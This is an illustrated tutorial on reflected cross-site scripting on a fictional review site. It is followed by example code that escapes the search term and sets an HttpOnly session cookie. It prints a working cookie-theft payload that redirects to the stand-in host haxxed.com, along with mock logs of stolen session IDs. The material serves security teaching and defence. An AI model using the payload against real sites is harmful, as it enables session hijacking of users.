Reflected XSS
Mal is a hacker who has noticed that your site's search function passes search terms in the URL.
He knows the search terms in the URL will get displayed back on the search results page, and he wonders if they are escaped properly.
To test this, he crafts a URL with a snippet of JavaScript in the search parameter.
Sure enough, when he drops the URL in his browser, the injected JavaScript is executed and the browser redirects to his malicious site.
Mal can now check his server log and hijack Vic's session, since the malicious redirect passed Vic's session ID in the URL.
Mal
Let's look in my big book of hacks.
www.welp.com?search=<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>
All your sessions are belong to us.
The indifferent restaurant review site
I guess you should search for food or something.
Server Logs
http://www.haxxed.com?cookie=asdfefefffasdfCsdfnE
http://www.haxxed.com?cookie=engkelfiAnlJreklfNkl
http://www.haxxed.com?cookie=SneklfjsdkleekflaAne
http://www.haxxed.com?cookie=asFFEfn222fefeknladf
Webpage HTML
<div class="search-terms">
  Search results for "<script>
    window.location="http://www.haxxed.com?cookie="+document.cookie
  </script>"
</div>

<h6>No results found</h6>
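The escaping that the markup above is missing, as an added example that is not part of the original lesson: the same search term rendered unescaped and then HTML-encoded, plus a session cookie marked HttpOnly so page script cannot read it through document.cookie. The function names, the cookie name `session` and the sample request URL are assumptions made for this illustration.

```javascript
// Added example: output-encode the reflected search term before it reaches the HTML.
// Function names, the cookie name and the sample URL are assumptions for illustration.

// The five characters that can change HTML structure, mapped to entities.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ENTITIES[ch]);
}

// Vulnerable form, as in the lesson: the term is concatenated into the markup as-is.
function renderSearchTermsUnsafe(term) {
  return `<div class="search-terms">Search results for "${term}"</div>`;
}

// Hardened form: the term is encoded, so the browser displays it as text.
function renderSearchTermsSafe(term) {
  return `<div class="search-terms">Search results for "${escapeHtml(term)}"</div>`;
}

// Pull the search parameter out of a request URL the way a server would.
function searchTermFromUrl(requestUrl) {
  return new URL(requestUrl).searchParams.get("search") ?? "";
}

// Session cookie with HttpOnly set, so script in the page cannot read it.
function sessionCookieHeader(sessionId) {
  return `session=${encodeURIComponent(sessionId)}; HttpOnly; Secure; SameSite=Lax; Path=/`;
}

// Constructed sample request carrying the lesson's payload in the search parameter.
const SAMPLE_URL =
  "http://www.welp.com/?search=" +
  encodeURIComponent('<script>window.location="http://www.haxxed.com?cookie="+document.cookie</script>');

function demo() {
  const term = searchTermFromUrl(SAMPLE_URL);
  return {
    unsafe: renderSearchTermsUnsafe(term),
    safe: renderSearchTermsSafe(term),
    cookie: sessionCookieHeader("constructed-session-id"),
  };
}

console.log(demo());
```

The encoded output still shows the visitor exactly what was typed into the search box; only its interpretation by the browser changes.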
The indifferent restaurant review site

Search results for ""

Vic
This seems relevant to my interests.
Where's this taco then?
I am not having a good day.